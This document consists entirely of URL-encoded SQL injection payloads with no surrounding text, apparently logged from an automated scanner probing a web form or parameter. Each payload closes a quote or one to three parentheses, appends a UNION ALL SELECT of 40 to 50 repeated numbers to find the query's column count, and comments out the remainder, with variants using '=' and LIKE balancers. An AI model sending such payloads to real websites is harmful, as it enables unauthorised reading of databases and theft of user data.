-9463%27%29%20UNION%20ALL%20SELECT%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522%2C%205522--%20%20AND%20%28%27tYPz%27%3D%27tYPz -3367%27%29%20UNION%20ALL%20SELECT%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914--%20%20AND%20%28%27YXcs%27%3D%27YXcs -7340%27%29%20UNION%20ALL%20SELECT%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914%2C%208914--%20%20AND%20%28%27aypz%27%3D%27aypz -3610%27%29%20UNION%20ALL%20SELECT%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815%2C%207815--%20%20AND%20%28%27hMxS%27%3D%27hMxS -5901%27%29%20UNION%20ALL%20SELECT%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056--%20%20AND%20%28%27ykWt%27%3D%27ykWt -2280%27%29%20UNION%20ALL%20SELECT%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812--%20%20AND%20%28%27sNko%27%3D%27sNko -2090%27%29%20UNION%20ALL%20SELECT%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097--%20%20AND%20%28%27IZNo%27%3D%27IZNo -4508%27%29%20UNION%20ALL%20SELECT%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097--%20%20AND%20%28%27iiGo%27%3D%27iiGo -6632%27%29%29%20UNION%20ALL%20SELECT%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522%2C%204522--%20%20AND%20%28%28%27SBFy%27%3D%27SBFy -1673%27%29%29%20UNION%20ALL%20SELECT%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590%2C%206590--%20%20AND%20%28%28%27pDfC%27%3D%27pDfC -5250%27%29%29%20UNION%20ALL%20SELECT%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315%2C%201315--%20%20AND%20%28%28%27kRyY%27%3D%27kRyY -5087%27%29%29%20UNION%20ALL%20SELECT%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968%2C%202968--%20%20AND%20%28%28%27cMNR%27%3D%27cMNR -1741%27%29%29%20UNION%20ALL%20SELECT%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754%2C%205754--%20%20AND%20%28%28%27eAHh%27%3D%27eAHh -3453%27%29%29%20UNION%20ALL%20SELECT%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630--%20%20AND%20%28%28%27QMQy%27%3D%27QMQy -4726%27%29%29%20UNION%20ALL%20SELECT%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509--%20%20AND%20%28%28%27xosD%27%3D%27xosD -9904%27%29%29%20UNION%20ALL%20SELECT%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038--%20%20AND%20%28%28%27mPrx%27%3D%27mPrx -6564%27%29%29%20UNION%20ALL%20SELECT%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292%2C%203292--%20%20AND%20%28%28%27KjsM%27%3D%27KjsM -5179%27%29%29%20UNION%20ALL%20SELECT%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939--%20%20AND%20%28%28%27yZJj%27%3D%27yZJj -3616%27%29%29%29%20UNION%20ALL%20SELECT%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308--%20%20AND%20%28%28%28%27kPYE%27%3D%27kPYE -4370%27%29%29%29%20UNION%20ALL%20SELECT%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965--%20%20AND%20%28%28%28%27pAyL%27%3D%27pAyL -3267%27%29%29%29%20UNION%20ALL%20SELECT%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545--%20%20AND%20%28%28%28%27tQTy%27%3D%27tQTy -7387%27%29%29%29%20UNION%20ALL%20SELECT%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934--%20%20AND%20%28%28%28%27Psqb%27%3D%27Psqb -4545%27%29%29%29%20UNION%20ALL%20SELECT%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214%2C%207214--%20%20AND%20%28%28%28%27WgpF%27%3D%27WgpF -2336%27%29%29%29%20UNION%20ALL%20SELECT%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486--%20%20AND%20%28%28%28%27orbP%27%3D%27orbP -2560%27%29%29%29%20UNION%20ALL%20SELECT%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813--%20%20AND%20%28%28%28%27CmoJ%27%3D%27CmoJ -6419%27%29%29%29%20UNION%20ALL%20SELECT%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512--%20%20AND%20%28%28%28%27rdLv%27%3D%27rdLv -1078%27%29%29%29%20UNION%20ALL%20SELECT%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248--%20%20AND%20%28%28%28%27HSZD%27%3D%27HSZD -7348%27%29%29%29%20UNION%20ALL%20SELECT%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724%2C%203724--%20%20AND%20%28%28%28%27ndjw%27%3D%27ndjw -6581%27%20UNION%20ALL%20SELECT%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282%2C%206282--%20%20AND%20%27AnRF%27%3D%27AnRF -2518%27%20UNION%20ALL%20SELECT%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643--%20%20AND%20%27Yigw%27%3D%27Yigw -1494%27%20UNION%20ALL%20SELECT%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168--%20%20AND%20%27NLIY%27%3D%27NLIY -8048%27%20UNION%20ALL%20SELECT%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389%2C%207389--%20%20AND%20%27JyFD%27%3D%27JyFD -3440%27%20UNION%20ALL%20SELECT%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746%2C%202746--%20%20AND%20%27TBad%27%3D%27TBad -9130%27%20UNION%20ALL%20SELECT%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364%2C%207364--%20%20AND%20%27OWAu%27%3D%27OWAu -8665%27%20UNION%20ALL%20SELECT%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446%2C%205446--%20%20AND%20%27Ggkz%27%3D%27Ggkz -2644%27%20UNION%20ALL%20SELECT%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515%2C%209515--%20%20AND%20%27UXHN%27%3D%27UXHN -6701%27%20UNION%20ALL%20SELECT%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708%2C%203708--%20%20AND%20%27Avdj%27%3D%27Avdj -4381%27%20UNION%20ALL%20SELECT%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459%2C%204459--%20%20AND%20%27ygpz%27%3D%27ygpz -4092%27%29%20UNION%20ALL%20SELECT%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390%2C%208390--%20%20AND%20%28%27vEua%27%20LIKE%20%27vEua -3575%27%29%20UNION%20ALL%20SELECT%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775--%20%20AND%20%28%27JNnw%27%20LIKE%20%27JNnw -1725%27%29%20UNION%20ALL%20SELECT%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787%2C%209787--%20%20AND%20%28%27XhVU%27%20LIKE%20%27XhVU -3750%27%29%20UNION%20ALL%20SELECT%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786%2C%208786--%20%20AND%20%28%27NDSJ%27%20LIKE%20%27NDSJ -1911%27%29%20UNION%20ALL%20SELECT%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176%2C%205176--%20%20AND%20%28%27ffWN%27%20LIKE%20%27ffWN -8788%27%29%20UNION%20ALL%20SELECT%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210--%20%20AND%20%28%27dEsK%27%20LIKE%20%27dEsK -8468%27%29%20UNION%20ALL%20SELECT%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243%2C%204243--%20%20AND%20%28%27waok%27%20LIKE%20%27waok -6235%27%29%20UNION%20ALL%20SELECT%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158--%20%20AND%20%28%27sTdE%27%20LIKE%20%27sTdE 